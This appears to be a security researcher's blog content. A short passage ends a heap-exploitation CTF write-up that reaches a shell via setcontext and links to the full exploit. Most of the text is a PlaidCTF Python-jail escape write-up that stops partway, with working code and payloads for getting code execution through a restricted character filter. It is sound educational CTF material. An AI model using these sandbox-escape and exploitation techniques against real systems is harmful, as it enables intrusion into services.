<p><a href="http://2.bp.blogspot.com/-1ZHSGrcDBNM/U2Fpa741amI/AAAAAAAAAHU/9FYwwi9vzgI/s1600/snapshot.png"><img src="http://2.bp.blogspot.com/-1ZHSGrcDBNM/U2Fpa741amI/AAAAAAAAAHU/9FYwwi9vzgI/s1600/snapshot.png" alt="" /></a></p>
<p>Looks good! Now we just have to set up a trampoline in order to be able to call
into <code class="highlighter-rouge">setcontext</code>, because we need a pointer to the code in <code class="highlighter-rouge">rax</code>, remember? But
that’s easy: we just add a new note and cross our fingers that it doesn’t mess up
everything. (If it does we can put it somewhere else: libc stdio buffers, a note
that we allocate before all this setting up, etc…) Once we have our note with
the address of <code class="highlighter-rouge">setcontext + 0x57</code> in it, we need to set up note0 with the address
of the trampoline. We can read the address in gdb; setting up note0 is business
as usual, it’s the same as we did for <code class="highlighter-rouge">free</code> and <code class="highlighter-rouge">dump_file</code>.</p>
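<p>The double indirection is easy to get wrong, so here is a toy model of the
dispatch in Python. It only mirrors <code class="highlighter-rouge">mov rax,[rdi]; call [rax]</code>; the addresses
used with it are hypothetical and the function names are mine.</p>

```python
def plant_trampoline(memory, note0, trampoline, target):
    """Store target in the trampoline note and point note0 at the trampoline."""
    memory[trampoline] = target
    memory[note0] = trampoline


def call_target(memory, rdi):
    """Model `mov rax,[rdi]; call [rax]`: two dereferences starting at rdi."""
    rax = memory[rdi]   # first 8 bytes of the favorite item (note0)
    return memory[rax]  # the address stored in the trampoline


# Hypothetical addresses, only to show the chain.
MEMORY = {}
SETCONTEXT = 0x7FFFF7A50000
plant_trampoline(MEMORY, note0=0x1000, trampoline=0x2000, target=SETCONTEXT + 0x57)
```

<p>With this layout, <code class="highlighter-rouge">call_target(MEMORY, 0x1000)</code> gives <code class="highlighter-rouge">SETCONTEXT + 0x57</code>.</p>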
<p>Once we trigger this we have a shell. Full exploit can be found here:
<a href="http://pastebin.com/0px8FEJ7">http://pastebin.com/0px8FEJ7</a> It works on my
machine, but it depends on libc which means it might require some adjustments
before it does on yours. gl;hf.</p>
<p>Ps: The reason I use bash and not sh for this exploit is that sh crashed on my
laptop when called from this exploit, I have no idea why.</p>wapiflapiLong time no see! I just spent two days exploiting a CTF challenge and people want me to do a writeup so here we go. Full sploit can be found here: http://pastebin.com/0px8FEJ7A python’s escape from PlaidCTF jail2013-04-22T00:00:00+00:002013-04-22T00:00:00+00:00https://wapiflapi.github.io/2013/04/22/plaidctf-pyjail-story-of-pythons-escape<p>Python jails are pretty common among CTF challenges. Often a good knowledge of
the interpreter’s internals gets you a long way. For the uninitiated it might
sometimes seem like black magic. PlaidCTF offered a challenging task that
required the combination of some different techniques and logic.</p>
<p>This time there was a service listening on the remote server, with a python
script called for each new connection. We were told we had to get a shell
because we couldn’t guess where the flag was stored. Another important detail
is that the challenge was running on python2.6.6.</p>
<p>The script was given to us and you can find its code
<a href="http://www.pnuts.tk/data/plaid2k13/pyjail/pyjail.py-ae426f39b325ed99123f590c8a8bbe224fefb406">here</a>.</p>
<h1 id="overview">Overview</h1>
<p>Basically it sets up a jail, and then executes user input after some restricting
checks. I shall present the different protections before explaining how we can
bypass most of them, and finally escape from this jail.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">sys</span> <span class="kn">import</span> <span class="n">modules</span>
<span class="n">modules</span><span class="o">.</span><span class="n">clear</span><span class="p">()</span>
<span class="k">del</span> <span class="n">modules</span>
</code></pre></div></div>
<p><code class="highlighter-rouge">sys.modules</code> is a dictionary that contains all the modules which were imported
since the interpreter started. Clearing it breaks a lot of things,
because often a standard function will check if some
module is present. But deleting the modules altogether breaks even more code,
because now the check itself raises an exception!</p>
<p>The next step in setting up the jail’s environment is this:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">__builtins__</span><span class="o">.</span><span class="n">__dict__</span><span class="o">.</span><span class="n">clear</span><span class="p">()</span>
<span class="n">__builtins__</span> <span class="o">=</span> <span class="bp">None</span>
</code></pre></div></div>
<p>This is pretty self explanatory. It clears the dictionary python uses to find
its builtins and we can’t use them anymore except if we already have a reference
to the builtin we need somewhere else.</p>
<p>There is one protection left, but it doesn’t try to limit what we can do, it
only tries to make it harder by filtering out certain characters and imposing a
length limit. Notice that the script calls <code class="highlighter-rouge">_raw_input</code>, which is just a backup it
made of <code class="highlighter-rouge">raw_input</code> before clearing the builtins.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">inp</span> <span class="o">=</span> <span class="n">_raw_input</span><span class="p">()</span>
<span class="n">inp</span> <span class="o">=</span> <span class="n">inp</span><span class="o">.</span><span class="n">split</span><span class="p">()[</span><span class="mi">0</span><span class="p">][:</span><span class="mi">1900</span><span class="p">]</span>
<span class="c1">#Dick move: you also have to only use the characters that my solution did.
</span><span class="n">inp</span> <span class="o">=</span> <span class="n">inp</span><span class="o">.</span><span class="n">translate</span><span class="p">(</span><span class="s">""</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="nb">map</span><span class="p">(</span><span class="nb">chr</span><span class="p">,</span> <span class="nb">xrange</span><span class="p">(</span><span class="mi">256</span><span class="p">))),</span>
<span class="s">'"!#$&*+-/0123456789;=>?ABCDEFGHIJKLMNOPQRSTUVWXYZ</span><span class="se">\\</span><span class="s">^abcdefghijklmnopqrstuvwxyz|'</span><span class="p">)</span>
</code></pre></div></div>
<p>Basically this means our input should be 1900 bytes or less, and should only
contain characters in the <code class="highlighter-rouge">set([':', '%', "'", '`', '(', ',', ')', '}', '{', '[', '.', ']', '<', '_', '~'])</code>.
The split ensures there can’t be any whitespace. It’s important to note that we
are also allowed to use most of the non printable characters if we want to.</p>
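<p>For experimenting outside the jail, here is a Python 3 rendition of that
input handling. It is a sketch, not the challenge code: Python 3’s
<code class="highlighter-rouge">str.translate</code> takes a single table, so the deleted characters go through
<code class="highlighter-rouge">str.maketrans</code>, and the names <code class="highlighter-rouge">BANNED</code> and <code class="highlighter-rouge">jail_filter</code> are mine.</p>

```python
import string

# Same characters as the second argument of translate() in the script above.
BANNED = (
    '"!#$&*+-/' + string.digits + ';=>?' + string.ascii_uppercase
    + '\\^' + string.ascii_lowercase + '|'
)
MAX_LEN = 1900


def jail_filter(inp):
    """Keep the first whitespace-separated word, truncate it to MAX_LEN
    characters, then silently delete every banned character."""
    inp = inp.split()[0][:MAX_LEN]
    return inp.translate(str.maketrans('', '', BANNED))
```

<p>Banned characters are dropped rather than rejected, so <code class="highlighter-rouge">jail_filter("a=1")</code>
comes back as an empty string while <code class="highlighter-rouge">jail_filter("(~_<_)")</code> is left untouched.</p>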
<p>After all this we finally get to the interesting part: code execution! We are
lucky because it is in two stages, so we have twice the fun :-)</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">exec</span> <span class="s">'a='</span> <span class="o">+</span> <span class="n">_eval</span><span class="p">(</span><span class="n">inp</span><span class="p">,</span> <span class="p">{})</span> <span class="ow">in</span> <span class="p">{}</span>
</code></pre></div></div>
<p>Don’t be fooled. The eval is not in the exec. It could be written like this:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">cmd</span> <span class="o">=</span> <span class="s">'a='</span> <span class="o">+</span> <span class="n">_eval</span><span class="p">(</span><span class="n">inp</span><span class="p">,</span> <span class="p">{})</span>
<span class="k">exec</span> <span class="n">cmd</span> <span class="ow">in</span> <span class="p">{}</span>
</code></pre></div></div>
<p>Quick reminder, in python <code class="highlighter-rouge">eval</code> is used to evaluate an expression and returns
its value whereas <code class="highlighter-rouge">exec</code> is a statement that compiles and executes a set of
statements. In short this means you can execute statements when you are using
<code class="highlighter-rouge">exec</code> but not when using <code class="highlighter-rouge">eval</code>.</p>
<p>The empty dict given to <code class="highlighter-rouge">eval</code> as its second parameter and the <code class="highlighter-rouge">in {}</code> after the
<code class="highlighter-rouge">exec</code> both mean the same thing, that the code should be evaluated in a new
empty scope. So we can’t (in theory) pass stuff from the <code class="highlighter-rouge">eval</code> to the <code class="highlighter-rouge">exec</code>,
or interact with the outer-world in any way.</p>
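<p>A small Python 3 sketch of the same two stages, to make the data flow
explicit. Unlike in the jail, the builtins are still available here, and
<code class="highlighter-rouge">run_jail</code> is a name I made up.</p>

```python
def run_jail(inp):
    """Python 3 rendition of `exec 'a=' + _eval(inp, {}) in {}`."""
    value = eval(inp, {})      # stage 1: a single expression, fresh globals
    scope = {}
    exec('a=' + value, scope)  # stage 2: statements, another fresh scope
    return scope['a']
```

<p>The expression has to evaluate to a string, otherwise the concatenation
fails. That string is then executed as statements: <code class="highlighter-rouge">run_jail("'1+1'")</code> ends up
running <code class="highlighter-rouge">a=1+1</code>, whereas handing <code class="highlighter-rouge">a=1</code> directly to <code class="highlighter-rouge">eval</code> is a syntax error.</p>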
<p>Most things in python are just references, and we can see this here again. These
protections only remove references. The original modules like <code class="highlighter-rouge">os</code>, and the
builtins are not altered in any way. Our task is quite clear: we need to find a
reference to something useful and use it to find the flag on the file
system. But first we need to find a way of executing code with so few
characters allowed.</p>
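<p>A quick Python 3 illustration of the “only references are removed” point.
It ignores the character filter entirely and is not the route taken in this
write-up, just a sketch with a made up function name.</p>

```python
def reach_object_without_builtins():
    """Walk from a tuple literal to `object` with no builtins in scope."""
    scope = {"__builtins__": {}}
    return eval("().__class__.__base__", scope)


def builtin_lookup_fails(name):
    """True if looking up `name` with emptied builtins raises NameError."""
    try:
        eval(name, {"__builtins__": {}})
    except NameError:
        return True
    return False
```

<p>Name lookups such as <code class="highlighter-rouge">len</code> fail, but attribute access on a literal still
reaches the type hierarchy, and everything else hangs off that.</p>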
<h1 id="running-code">Running code</h1>
<p>How do we get code running with only characters from <code class="highlighter-rouge">set([':', '%', "'", '`', '(', ',', ')', '}', '{', '[', '.', ']', '<', '_', '~'])</code>? Answer: It’s python,
python is fun, let’s have some fun.</p>
<p>We have everything we need to build tuples <code class="highlighter-rouge">()</code>, lists <code class="highlighter-rouge">[]</code> and dictionaries
<code class="highlighter-rouge">{:}</code>. If it was python 2.7 we could also make sets using <code class="highlighter-rouge">{}</code> but sadly that
isn’t the case. We can also build strings using <code class="highlighter-rouge">' '</code> and we could use <code class="highlighter-rouge">%</code> to do
some formatting. The comma will obviously help when building tuples or lists,
and the dot might be useful to access attributes.</p>
<p>We haven’t talked about <code class="highlighter-rouge"><</code>, <code class="highlighter-rouge">~</code>, <code class="highlighter-rouge">_</code> and <code class="highlighter-rouge">`</code> yet. <code class="highlighter-rouge"><</code> and <code class="highlighter-rouge">~</code> are simple
operators: we can do less-than comparison and bitwise negation. <code class="highlighter-rouge">_</code> would be a
way to have a valid variable identifier, but we do not have <code class="highlighter-rouge">=</code> so
that might not be of much use.</p>
<p>Now, if you are like me and didn’t know <code class="highlighter-rouge">`</code> actually did something in
python2 you might be surprised! As it turns out <code class="highlighter-rouge">`x`</code> is equivalent to
<code class="highlighter-rouge">repr(x)</code>! This means we can produce strings out of objects.</p>
<p>Some of these symbols can be used for multiple purposes: <code class="highlighter-rouge">%</code> can be used for
string formatting but also for integer modulo, and <code class="highlighter-rouge"><</code> can be used both for
comparing two integers and, in the form of <code class="highlighter-rouge"><<</code>, for shifting them to the left.</p>
<p>We can see that most of the characters we are allowed to use are pretty useful
and I dare say it is easier doing python with only those than it would be
without them!</p>
<p>Remember we have two execution stages, first the <code class="highlighter-rouge">eval</code>, then the <code class="highlighter-rouge">exec</code>. The
<code class="highlighter-rouge">exec</code> executes what the <code class="highlighter-rouge">eval</code> returns. So we should consider the <code class="highlighter-rouge">eval</code> as a
decoder. The 1900 character limit is supposed to force you to think a lot about
this, but we bypassed it (as I will explain later), which is why we didn’t put too
much thought into the encoding scheme.</p>
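<p>The first thing to notice is that <code class="highlighter-rouge">[]<[]</code> is <code class="highlighter-rouge">False</code>, which is pretty
logical. What is less obvious but serves us well is the fact that <code class="highlighter-rouge">{}<[]</code>
evaluates to <code class="highlighter-rouge">True</code>: CPython 2 orders objects of different non-numeric types by
their type names, and <code class="highlighter-rouge">'dict'</code> sorts before <code class="highlighter-rouge">'list'</code>.</p>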
<p><code class="highlighter-rouge">True</code> and <code class="highlighter-rouge">False</code>, when used in arithmetic operations, behave like <code class="highlighter-rouge">1</code> and
<code class="highlighter-rouge">0</code>. This will be the building block of our decoder but we still need to find a
way to actually produce arbitrary strings.</p>
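<p>A quick sketch of booleans acting as integers. It is written for Python 3, where the mixed-type comparison used by the payload is rejected, so <code class="highlighter-rouge">True</code> and <code class="highlighter-rouge">False</code> are spelled out directly; the variable names are only illustrative:</p>

```python
# bool is a subclass of int, so comparison results can be used as 1 and 0.
one, zero = True, False

total = one + one + zero     # plain integer arithmetic
doubled = one << one         # the "x2" building block: 1 << 1
negated = ~(one + zero)      # bitwise NOT of the integer 1

# Python 3 refuses the dict-versus-list comparison that Python 2 allows.
try:
    {} < []
    mixed_ok = True
except TypeError:
    mixed_ok = False

print(total, doubled, negated, mixed_ok)
```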
<h2 id="getting-characters">Getting characters</h2>
<p>Let’s start with a generic solution, we will improve on it later. Getting the
numeric ASCII values of our characters seems doable with <code class="highlighter-rouge">True</code>, <code class="highlighter-rouge">False</code>, <code class="highlighter-rouge">~</code>
and <code class="highlighter-rouge"><<</code>. But we need something like <code class="highlighter-rouge">str()</code> or <code class="highlighter-rouge">"%c"</code>. This is where the
invisible characters come in handy! <code class="highlighter-rouge">"\xcb"</code> for example, it’s not even ascii as
it is larger than 127, but it is valid in a python string, and we can send it to
the server.</p>
<p>If we take its representation using <code class="highlighter-rouge">`'_\xcb_'`</code> (In practice we will send a
byte with the value <code class="highlighter-rouge">0xcb</code> <em>not</em> <code class="highlighter-rouge">'\xcb'</code>), we have a string containing a c. We
also need a <code class="highlighter-rouge">'%'</code>, and we need those two, and those two only.</p>
<p>We want this: <code class="highlighter-rouge">`'%\xcb'`[1::3]</code> , using True and False to build the numbers we
get:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="sb">`'%\xcb'`</span><span class="p">[{}</span><span class="o"><</span><span class="p">[]::</span><span class="o">~</span><span class="p">(</span><span class="o">~</span><span class="p">({}</span><span class="o"><</span><span class="p">[])</span><span class="o"><<</span><span class="p">({}</span><span class="o"><</span><span class="p">[]))]</span>
</code></pre></div></div>
<p>There you go! Now, provided we can build any number using the same trick as
for the indexes, we just have to use the above and <code class="highlighter-rouge">%(number)</code> to get any
character we want.</p>
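<p>The slice can be checked without a Python 2 interpreter. In the sketch below, the Python 2 <code class="highlighter-rouge">repr</code> of the string is emulated (an assumption of this example) by taking the <code class="highlighter-rouge">repr</code> of a Python 3 bytes literal and dropping its leading <code class="highlighter-rouge">b</code>:</p>

```python
# Emulate Python 2's repr('%\xcb') on Python 3: the repr of the bytes
# literal is b'%\xcb', so dropping the first character leaves '%\xcb'.
py2_repr = repr(b"%\xcb")[1:]      # 7 characters, quotes included

fmt = py2_repr[1::3]               # index 1 is '%', index 4 is 'c'
star = fmt % 42                    # '%c' % 42 gives the character with code 42

print(py2_repr, fmt, star)
```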
<p>Some optimization is possible for specific characters by finding them in the
representations of True, False and the invisible characters. As I am about to
bypass the length limit I didn’t bother doing this too much.</p>
<h2 id="numbers">Numbers</h2>
<p>This is where I failed during the CTF and what cost me the shame of getting
the flag five minutes after the end. Had I coded something to automate the
process of getting arbitrary numbers I wouldn’t have missed spaces when I
finally got a shell. But more on that later. The point is I shall do it right
now.</p>
<p>If you have ever studied any logic you might have encountered the claim that
everything could be done with NAND gates. NOT-AND. This is remarkably close to
how we shall proceed, except for the fact we shall use multiply-by-two instead
of AND. We won’t use True.</p>
<p>Everything can be done using only <code class="highlighter-rouge">False</code> (0), <code class="highlighter-rouge">~</code> (not), <code class="highlighter-rouge"><<</code> (x2), let me show
you with an example. We shall go from 42 to 0 using <code class="highlighter-rouge">~</code> and <code class="highlighter-rouge">/2</code>, then we can
revert that process using <code class="highlighter-rouge">~</code> and <code class="highlighter-rouge">*2</code>.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="mi">42</span> <span class="c1"># /2
</span> <span class="mi">21</span> <span class="c1"># ~
</span><span class="o">-</span><span class="mi">22</span> <span class="c1"># /2
</span><span class="o">-</span><span class="mi">11</span> <span class="c1"># ~
</span> <span class="mi">10</span> <span class="c1"># /2
</span> <span class="mi">5</span> <span class="c1"># ~
</span> <span class="o">-</span><span class="mi">6</span> <span class="c1"># /2
</span> <span class="o">-</span><span class="mi">3</span> <span class="c1"># ~
</span> <span class="mi">2</span> <span class="c1"># /2
</span> <span class="mi">1</span>
<span class="bp">True</span> <span class="o">=</span> <span class="o">~</span><span class="p">(</span><span class="o">~</span><span class="p">(</span><span class="o">~</span><span class="p">(</span><span class="o">~</span><span class="p">(</span><span class="mi">42</span><span class="o">/</span><span class="mi">2</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span>
</code></pre></div></div>
<p>Basically we divided by two when we could, else we inverted all the bits. The
nice property of this is that when inverting we are guaranteed to be able to
divide by two afterward. So that finally we shall hit 1, 0 or -1.</p>
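<p>The reduction can be traced mechanically. The helper below is a hypothetical name introduced for this sketch; it simply applies the rule “halve when even, otherwise invert” until it reaches 1, 0 or -1:</p>

```python
def reduce_to_unit(n):
    """Halve while even, otherwise flip all bits, until -1, 0 or 1."""
    steps = [n]
    while n not in (-1, 0, 1):
        n = n // 2 if n % 2 == 0 else ~n
        steps.append(n)
    return steps

trace = reduce_to_unit(42)
print(trace)
```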
<p>But wait. Didn’t I say we would not use True, 1? Yes I did, but I lied. We will
use it because True is obviously shorter than <code class="highlighter-rouge">~(~False*2)</code>, especially
considering the fact we will use True anyway to do x2, which in our case is of
course <code class="highlighter-rouge"><<({}<[])</code>.</p>
<p>Anyway, the moment we hit 1, 0 or -1 we can just use <code class="highlighter-rouge">True</code>, <code class="highlighter-rouge">False</code> or
<code class="highlighter-rouge">~False</code>.</p>
<p>So now we can reverse this and we have:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mi">42</span> <span class="o">=</span> <span class="o">~</span><span class="p">(</span><span class="o">~</span><span class="p">(</span><span class="o">~</span><span class="p">(</span><span class="o">~</span><span class="p">(</span><span class="mi">1</span><span class="o">*</span><span class="mi">2</span><span class="p">)</span><span class="o">*</span><span class="mi">2</span><span class="p">)</span><span class="o">*</span><span class="mi">2</span><span class="p">)</span><span class="o">*</span><span class="mi">2</span><span class="p">)</span><span class="o">*</span><span class="mi">2</span>
</code></pre></div></div>
<p>Using what we are allowed to:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mi">42</span> <span class="o">=</span> <span class="o">~</span><span class="p">(</span><span class="o">~</span><span class="p">(</span><span class="o">~</span><span class="p">(</span><span class="o">~</span><span class="p">(({}</span><span class="o"><</span><span class="p">[])</span><span class="o"><<</span><span class="p">({}</span><span class="o"><</span><span class="p">[]))</span><span class="o"><<</span><span class="p">({}</span><span class="o"><</span><span class="p">[]))</span><span class="o"><<</span><span class="p">({}</span><span class="o"><</span><span class="p">[]))</span><span class="o"><<</span><span class="p">({}</span><span class="o"><</span><span class="p">[]))</span><span class="o"><<</span><span class="p">({}</span><span class="o"><</span><span class="p">[])</span>
</code></pre></div></div>
<p>How to not lose a CTF:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">brainfuckize</span><span class="p">(</span><span class="n">nb</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">nb</span> <span class="ow">in</span> <span class="p">[</span><span class="o">-</span><span class="mi">2</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">]:</span>
        <span class="k">return</span> <span class="p">[</span><span class="s">"~({}<[])"</span><span class="p">,</span> <span class="s">"~([]<[])"</span><span class="p">,</span>
                <span class="s">"([]<[])"</span><span class="p">,</span> <span class="s">"({}<[])"</span><span class="p">][</span><span class="n">nb</span><span class="o">+</span><span class="mi">2</span><span class="p">]</span>
    <span class="k">if</span> <span class="n">nb</span> <span class="o">%</span> <span class="mi">2</span><span class="p">:</span>
        <span class="k">return</span> <span class="s">"~</span><span class="si">%</span><span class="s">s"</span> <span class="o">%</span> <span class="n">brainfuckize</span><span class="p">(</span><span class="o">~</span><span class="n">nb</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">return</span> <span class="s">"(</span><span class="si">%</span><span class="s">s<<({}<[]))"</span> <span class="o">%</span> <span class="n">brainfuckize</span><span class="p">(</span><span class="n">nb</span><span class="o">/</span><span class="mi">2</span><span class="p">)</span>
</code></pre></div></div>
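<p>For readers without a Python 2 interpreter at hand, here is a sketch of the same encoder ported to Python 3 together with a checker. The names <code class="highlighter-rouge">encode_number</code> and <code class="highlighter-rouge">check</code> are introduced for this example only. Since Python 3 cannot evaluate the two comparison atoms, the checker substitutes the integers 1 and 0 for them before evaluating:</p>

```python
ALLOWED = set("~({}<[])")

def encode_number(nb):
    """Return an expression for nb built only from the allowed characters."""
    base = {-2: "~({}<[])", -1: "~([]<[])", 0: "([]<[])", 1: "({}<[])"}
    if nb in base:
        return base[nb]
    if nb % 2:
        # Odd: invert to get an even number, and undo that with a leading ~.
        return "~%s" % encode_number(~nb)
    # Even: encode half of it and shift left by one (that is, by True).
    return "(%s<<({}<[]))" % encode_number(nb // 2)

def check(expr):
    """Evaluate expr on Python 3 by replacing the atoms with 1 and 0."""
    py3 = expr.replace("({}<[])", "1").replace("([]<[])", "0")
    return eval(py3, {"__builtins__": {}})

encoded = encode_number(42)
print(len(encoded), check(encoded))
```

<p>The checker is only a convenience for testing; the expressions themselves are still meant to be evaluated by the Python 2 jail.</p>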
<p>I wonder if using % as a modulo might optimize the length of some of these
expressions. If you have any thoughts about this feel free to talk to me about
it!</p>
<h2 id="and-in-the-darkness-bind-them"><em>And in the darkness bind them!</em></h2>
<p>Joining is not trivial, but there is a little trick that makes it quite easy.
If we were building a list of characters the representation of that list would
contain all those characters (obviously), and the best part is they should be
equally spaced. A simple slice should be enough to give us the complete string.</p>
<pre><code class="language-pycon">>>> `['a', 'b', 'c', 'd']`[2::5]
'abcd'
>>> `['a', 'b', 'c', 'd']`[(({}<[])<<({}<[]))::~(~(({}<[])<<({}<[]))<<({}<[]))]
'abcd'
</code></pre>
<p>Since we have the ability to generate arbitrary numbers and single characters
this works well.</p>
<p>However <em>care must be taken</em> because this does not always work. In particular
when the representation of a character is composed of more than one character,
such cases include but are not limited to <code class="highlighter-rouge">\n</code>, <code class="highlighter-rouge">\t</code>, <code class="highlighter-rouge">\\</code>, etc… Luckily those
characters are seldom needed, and we won’t use them.</p>
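<p>Both the trick and its limitation can be reproduced with <code class="highlighter-rouge">repr</code>, which for lists of plain ASCII strings behaves the same on Python 3. A short sketch:</p>

```python
chars = ["a", "b", "c", "d"]
joined = repr(chars)[2::5]          # "['a', 'b', 'c', 'd']" sliced every 5

# A newline is displayed as the two characters \ and n, which shifts
# everything after it and breaks the regular spacing.
broken = repr(["a", "\n", "b"])[2::5]

print(joined, repr(broken))
```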
<p>We can now generate almost all the code we want from the <code class="highlighter-rouge">eval()</code> and it will be
passed to the exec statement!</p>
<p>Before moving on to the next step, let’s enjoy some valid python code!</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="sb">`[`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%(((~(~(~(~(({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%((((~(~(~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%(~(~(~(~((~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%((((((({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%(~(((~((~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%(~(~((((~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%(~(~(~((~(~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span 
class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%(~(~(~(~((~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%((((((({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%(~(~((~(~(~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%(~((~((~((~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%((((((({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%(~((((~(~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%((~(((~(~(~({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))),`</span><span class="s">'</span><span class="si">%</span><span class="se">\xcb</span><span class="s">'</span><span class="sb">`[{}<[]::~(~({}<[])<<({}<[]))]%((~(((~(({}<[])<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[]))<<({}<[])))]`</span><span class="p">[(({}</span><span class="o"><</span><span class="p">[])</span><span class="o"><<</span><span class="p">({}</span><span class="o"><</span><span class="p">[]))::</span><span class="o">~</span><span class="p">(</span><span 
class="o">~</span><span class="p">(({}</span><span class="o"><</span><span class="p">[])</span><span class="o"><<</span><span class="p">({}</span><span class="o"><</span><span class="p">[]))</span><span class="o"><<</span><span class="p">({}</span><span class="o"><</span><span class="p">[]))]</span>
</code></pre></div></div>
<h1 id="about-python-scopes">About python scopes</h1>
<p>At this stage, and before trying to exploit anything, I think it might be useful
to give a quick aperçu of how python handles scopes. This won’t explain
everything there is to know about it and I strongly suggest you read more
about it if you are interested. If, however, you feel perfectly comfortable
with the way python handles and stores this stuff you may safely skip this
section.</p>
<p>There are two kinds of variables that I will talk about, namely <em>global</em> and
<em>local</em> variables. Of course, being python, there is no real difference between
the way a variable referring to a number, a class or a function, is handled.</p>
<h2 id="globals">globals</h2>
<p>What we usually call global variables are not in fact global in the same sense
as global variables in C would be. They are only global relative to the module
in which they are defined. When accessing them from outside their module you
would do for example: <code class="highlighter-rouge">math.pi</code> to access the global variable named <code class="highlighter-rouge">'pi'</code> in
the module <code class="highlighter-rouge">'math'</code>.</p>
<p>All the global variables in a module are stored in the module’s <code class="highlighter-rouge">__dict__</code> which
is an attribute of the module. Modifying this <code class="highlighter-rouge">__dict__</code> has the same effect as
using <code class="highlighter-rouge">setattr</code> on the module.</p>
<p>One can get the current module’s globals doing <code class="highlighter-rouge">sys.modules[__name__].__dict__</code>,
or more simply by calling <code class="highlighter-rouge">globals()</code>.</p>
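<p>A small sketch of the relationship between a module and its <code class="highlighter-rouge">__dict__</code>. The module named <code class="highlighter-rouge">demo</code> is a throwaway object created just for this example:</p>

```python
import math
import types

# A module's globals are simply the entries of its __dict__.
same_object = math.__dict__["pi"] is math.pi

# Assumption: "demo" is a throwaway module created just for this example.
demo = types.ModuleType("demo")
demo.__dict__["x"] = 1      # writing to __dict__ ...
setattr(demo, "y", 2)       # ... and setattr end up in the same place

print(same_object, demo.x, demo.__dict__["y"])
```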
<h2 id="locals">locals</h2>
